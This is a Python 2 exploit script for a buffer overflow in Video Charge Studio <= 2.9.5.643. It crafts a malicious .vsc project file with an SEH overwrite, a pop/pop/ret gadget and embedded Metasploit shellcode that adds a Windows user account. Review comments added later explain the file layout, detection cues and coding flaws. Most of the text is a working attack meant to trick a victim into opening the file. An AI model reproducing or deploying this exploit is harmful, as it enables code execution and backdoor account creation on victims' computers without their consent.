Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH) 2010-12-06 09:16:35

#!/usr/bin/python
# Exploit Title: Video Charge Studio &lt;= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
# Date: 12/05/2010
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe
# Version: &lt;= 2.9.5.643 (Latest)
# Tested on: Windows XP SP3 (Physical machine)
# CVE: N/A

### Software Description: ###
# Videocharge Studio is a video editing software which is intended for those users who
# regularly work with video, create Internet video galleries, convert video files.
# Videocharge Studio includes all features for video editing: video converting, splitting
# video into parts, joining several video files into a single one, adding watermark on
# video or image (add logo to video or photo), embedding image into video file, creating
# video from several images, editing audio. Videocharge Studio can edit video without
# reencoding as well.

### Exploit information: ###
# Video Charge Studio is prone to a buffer overflow when parsing a malicious vsc file's
# &quot;Filename&quot; value field.
# An attacker could trick a user into loading a specially crafted vsc file to execute
# arbitrary code on the user's PC without their consent.

### Shouts: ###
# kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity
# Have fun!

# &quot;When you know that you're capable of dealing with whatever comes, you have the only
# security the world has to offer.&quot; -Harry Browne

import struct
import sys

# NOTE(review): Python 2 script. It mixes print statements (`print about`,
# the "Payload size" line, the error line) with print() calls, so it does not
# run unmodified under Python 3.
about = &quot;=================================================\n&quot;
about += &quot; Video Charge Studio &lt;= 2.9.5.643 (.vsc) BoF (SEH)\n&quot;
about += &quot; Author: xsploited security\n URL: http://www.x-sploited.com/\n&quot;
about += &quot; Contact: xsploitedsecurity [at] gmail.com\n&quot;
about += &quot;=================================================\n&quot;
print about

# msfpayload windows/adduser user=xsploited pass=sec EXITFUNC=seh
# R | msfencode -e x86/fnstenv_mov -c 1 -t perl -b '\x00\x09\x0a
# \x0d\x3e\x3c\x26\x20\x21\x22\x23\x2a\x07' &gt; /tmp/encoded.txt
# [*] x86/fnstenv_mov succeeded with size 302 (iteration=1)

# Encoded payload bytes exactly as produced by the msfencode command above
# (21 lines of 14 bytes plus 8 = 302 bytes, matching the reported size).
# The excluded-byte list covers the characters that would break the
# surrounding XML document (0x3c '<', 0x3e '>', 0x26 '&', 0x22 '"', 0x20 ' ')
# plus NUL, TAB, CR and LF.
shellcode = (
&quot;\x6a\x46\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce&quot;
&quot;\xcf\xb0\x91\x83\xeb\xfc\xe2\xf4\x32\x27\x39\x91\xce\xcf&quot;
&quot;\xd0\x18\x2b\xfe\x62\xf5\x45\x9d\x80\x1a\x9c\xc3\x3b\xc3&quot;
&quot;\xda\x44\xc2\xb9\xc1\x78\xfa\xb7\xff\x30\x81\x51\x62\xf3&quot;
&quot;\xd1\xed\xcc\xe3\x90\x50\x01\xc2\xb1\x56\x2c\x3f\xe2\xc6&quot;
&quot;\x45\x9d\xa0\x1a\x8c\xf3\xb1\x41\x45\x8f\xc8\x14\x0e\xbb&quot;
&quot;\xfa\x90\x1e\x9f\x3b\xd9\xd6\x44\xe8\xb1\xcf\x1c\x53\xad&quot;
&quot;\x87\x44\x84\x1a\xcf\x19\x81\x6e\xff\x0f\x1c\x50\x01\xc2&quot;
&quot;\xb1\x56\xf6\x2f\xc5\x65\xcd\xb2\x48\xaa\xb3\xeb\xc5\x73&quot;
&quot;\x96\x44\xe8\xb5\xcf\x1c\xd6\x1a\xc2\x84\x3b\xc9\xd2\xce&quot;
&quot;\x63\x1a\xca\x44\xb1\x41\x47\x8b\x94\xb5\x95\x94\xd1\xc8&quot;
&quot;\x94\x9e\x4f\x71\x96\x90\xea\x1a\xdc\x24\x36\xcc\xa4\xce&quot;
&quot;\x3d\x14\x77\xcf\xb0\x91\x9e\xa7\x81\x1a\xa1\x48\x4f\x44&quot;
&quot;\x75\x31\xbe\xa3\x24\xa7\x16\x04\x73\x52\x4f\x44\xf2\xc9&quot;
&quot;\xcc\x9b\x4e\x34\x50\xe4\xcb\x74\xf7\x82\xbc\xa0\xda\x91&quot;
&quot;\x9d\x30\x65\xf2\xa3\xab\x9e\xf4\xb6\xaa\x90\xbe\xad\xef&quot;
&quot;\xde\xf4\xba\xef\xc5\xe2\xab\xbd\x90\xe9\xbd\xbf\xdc\xfe&quot;
&quot;\xa7\xbb\xd5\xf5\xee\xbc\xd5\xf2\xee\xe0\xf1\xd5\x8a\xef&quot;
&quot;\x96\xb7\xee\xa1\xd5\xe5\xee\xa3\xdf\xf2\xaf\xa3\xd7\xe3&quot;
&quot;\xa1\xba\xc0\xb1\x8f\xab\xdd\xf8\xa0\xa6\xc3\xe5\xbc\xae&quot;
&quot;\xc4\xfe\xbc\xbc\x90\xe9\xbd\xbf\xdc\xfe\xa7\xbb\xd5\xf5&quot;
&quot;\xee\xe0\xf1\xd5\x8a\xcf\xba\x91&quot;
);

# Hex-encoded start of an ordinary .vsc document. Decoded, the bytes read:
#   <?xml version="1.0" encoding="Windows-1252" ?><config ver="2.9.5.643">
#   <cols name="Files"/>
#   <cols name="Profiles">
#   <Property name="Profile">
#   <cols name="Formats">
#   <Property name="Format">
#   <Value name="Name" type="8" value="
# (lines separated by CR LF). The oversized string therefore lands in the
# `value` attribute of a `<Value name="Name" ...>` element nested under
# Profiles/Profile/Formats/Format. NOTE(review): the file header calls this
# the "Filename" field, while the bytes here say "Name"; reconcile the two
# before using either name in a detection rule for this file type.
header = (
&quot;\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30&quot;
&quot;\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69\x6e\x64\x6f\x77\x73\x2d&quot;
&quot;\x31\x32\x35\x32\x22\x20\x3f\x3e\x3c\x63\x6f\x6e\x66\x69\x67\x20\x76\x65\x72\x3d&quot;
&quot;\x22\x32\x2e\x39\x2e\x35\x2e\x36\x34\x33\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20&quot;
&quot;\x6e\x61\x6d\x65\x3d\x22\x46\x69\x6c\x65\x73\x22\x2f\x3e\x0d\x0a\x3c\x63\x6f\x6c&quot;
&quot;\x73\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66\x69\x6c\x65\x73\x22\x3e\x0d\x0a&quot;
&quot;\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66&quot;
&quot;\x69\x6c\x65\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20\x6e\x61\x6d\x65\x3d\x22\x46&quot;
&quot;\x6f\x72\x6d\x61\x74\x73\x22\x3e\x0d\x0a\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20&quot;
&quot;\x6e\x61\x6d\x65\x3d\x22\x46\x6f\x72\x6d\x61\x74\x22\x3e\x0d\x0a\x3c\x56\x61\x6c&quot;
&quot;\x75\x65\x20\x6e\x61\x6d\x65\x3d\x22\x4e\x61\x6d\x65\x22\x20\x74\x79\x70\x65\x3d&quot;
&quot;\x22\x38\x22\x20\x76\x61\x6c\x75\x65\x3d\x22&quot;
);

# Hex-encoded remainder of the document: it closes the `value` attribute and
# the open elements, i.e. `"/>`, `</Property>`, `</cols>`, `</Property>`,
# `</cols>`, `</config>`, each followed by CR LF except the last.
footer = (
&quot;\x22\x2f\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d\x0a&quot;
&quot;\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d&quot;
&quot;\x0a\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x63\x6f\x6e\x66\x69\x67\x3e&quot;
);

size = 824; #824 junk bytes triggers the bof

# The attribute value is padded with 0x90 so that padding + shellcode is
# exactly `size` bytes; the three short pieces appended afterwards are
# described by the author's inline comments. Total length is
# 824 + 4 + 4 + 5 = 837 bytes, which is what the "Payload size" line prints.
# For detection purposes: a legitimate `value` attribute of this element is
# unlikely to be several hundred bytes long or to consist mostly of 0x90.
payload = &quot;\x90&quot; * (size - len(shellcode));
payload += shellcode

payload += &quot;\xEB\x06\x90\x90&quot;; #jmp short
payload += struct.pack(&quot;&lt;L&quot;,0x61B8451C); #universal p/p/r - zlib1.dll (Apps path)
payload += &quot;\xe9\xe0\xfc\xff\xff&quot;; #jmp back 800 bytes

# Complete file contents: XML prologue, oversized attribute value, closing tags.
xsploit = header + payload + footer;

print(&quot;[*] Creating .vsc file&quot;);
print &quot;[*] Payload size = &quot; + str(len(payload)) + &quot; bytes&quot;;

# Writes evil.vsc into the current working directory, silently overwriting
# any existing file of that name.
# NOTE(review): the bare `except:` swallows every exception, including
# KeyboardInterrupt, and discards the reason the write failed (permissions,
# read-only directory, disk full); `except IOError as e:` with `e` in the
# message would report it. A `with open(...)` block would also close the
# file on error instead of relying on the explicit close() below.
try:
    out_file = open(&quot;evil.vsc&quot;,'w');
    out_file.write(xsploit);
    out_file.close();
    print(&quot;[*] Malicious vsc file created successfully&quot;);
    print(&quot;[*] Launch Video Charge Studio and load the file\n[*] Exiting...\r\n&quot;);
except:
    print &quot;[!] Error creating file&quot;;